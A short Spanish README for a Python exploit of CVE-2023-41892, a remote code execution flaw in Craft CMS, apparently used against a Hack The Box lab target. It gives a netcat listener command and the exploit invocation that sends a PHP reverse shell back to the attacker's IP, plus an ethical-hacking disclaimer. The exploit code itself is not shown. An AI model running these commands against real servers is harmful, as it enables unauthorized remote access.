
CVE-2023-41892 Reverse Shell
Este script de Python explota la vulnerabilidad de ejecución remota de código (CVE-2023-41892) de Craft CMS, un popular sistema de gestión de contenidos. Las versiones entre 4.0.0-RC1 y 4.4.14 se ven afectadas por esta vulnerabilidad, lo que permite a atacantes ejecutar código arbitrario de forma remota, como un shell inverso PHP.
Primero, inicie un listener de netcat en otra terminal:
nc -nlvp 1234
Luego, verifique su dirección IP y ejecute el exploit:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
¡Feliz hacking con su nuevo shell inverso!
Este código está destinado únicamente a fines de hacking ético y no debe utilizarse para actividades maliciosas.
Gracias a to016 por el código original que se puede encontrar en este Gist